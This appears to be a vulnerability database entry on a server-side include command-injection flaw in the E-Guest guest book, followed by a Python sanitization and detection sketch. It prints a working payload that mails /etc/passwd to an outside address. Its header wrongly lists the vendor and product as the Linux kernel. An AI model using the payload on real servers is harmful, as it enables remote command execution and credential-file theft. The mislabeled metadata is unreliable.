Vendor: Linux Kernel
By: SecurityFocus
CVSS: 7.5 (HIGH)
Type: Command Injection
CWE: 78
Product Name: Linux Kernel
Affected Version From: E-Guest 1.0
Affected Version To: E-Guest 1.0
Patch Exists: YES
Related CWE: CVE-2002-0991
CPE: o:linux:linux_kernel
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2002

E-Guest guest book Command Injection Vulnerability

E-Guest guest book is vulnerable to command injection because it does not sufficiently sanitize user-supplied input. An attacker can embed server-side include directives in a guest book entry, which could allow a remote user to execute commands on the local host.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5129/info

E-Guest guest book is a freely available, open source guest book. It is designed for Unix and Linux operating systems.

E-Guest does not adequately sanitize user-supplied input in guest book entries. Because of this, it is possible to pass along commands via server-side includes that could allow a remote user to execute commands on the local host.

Full Name: HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->
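The mitigation described above, sketched as an added example (not E-Guest's own code and not part of the original advisory): guest book fields are checked for server-side include directives so the attempt can be logged, then HTML-encoded before storage so the server's SSI parser never sees a `<!--#` sequence. The field names, the length limit and the sample entries are assumptions constructed for illustration.

```python
import html
import re

# Opening of an SSI directive, e.g. <!--#exec ...--> or <!--#include ...-->.
# Whitespace is tolerated so near-miss variants are still reported.
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*([a-z]+)", re.IGNORECASE)

MAX_FIELD_LEN = 200  # assumed per-field limit, not taken from E-Guest


def find_ssi_directives(value):
    """Return the names of SSI directives present in a raw field value."""
    return [m.group(1).lower() for m in SSI_DIRECTIVE.finditer(value)]


def sanitize_field(value, max_len=MAX_FIELD_LEN):
    """Make a field safe to write into a page that the server parses for SSI."""
    # Drop control characters, keeping newlines and tabs for message bodies.
    cleaned = "".join(ch for ch in value if ch.isprintable() or ch in "\n\t")
    cleaned = cleaned[:max_len]
    # Encoding '<', '>', '&' and quotes turns "<!--#exec" into "&lt;!--#exec",
    # which renders as text and is not an SSI directive.
    return html.escape(cleaned, quote=True)


def process_entry(fields):
    """Sanitize every field; return (safe_fields, findings) for logging."""
    safe, findings = {}, []
    for name, value in fields.items():
        # Detect on the raw value, before truncation or encoding.
        findings.extend((name, d) for d in find_ssi_directives(value))
        safe[name] = sanitize_field(value)
    return safe, findings


# Constructed sample entries (hypothetical field names, placeholder command).
HOSTILE_ENTRY = {
    "full_name": 'HI<!--#exec cmd="/bin/true"-->',
    "message": "Nice site!",
}
BENIGN_ENTRY = {"full_name": "Ann O'Neil", "message": "2 < 3 & 4 > 1"}

if __name__ == "__main__":
    for entry in (HOSTILE_ENTRY, BENIGN_ENTRY):
        safe, findings = process_entry(entry)
        print(safe, findings)
```

Encoding is what removes the risk; the detector only feeds logging and alerting, so a directive it misses is still rendered inert.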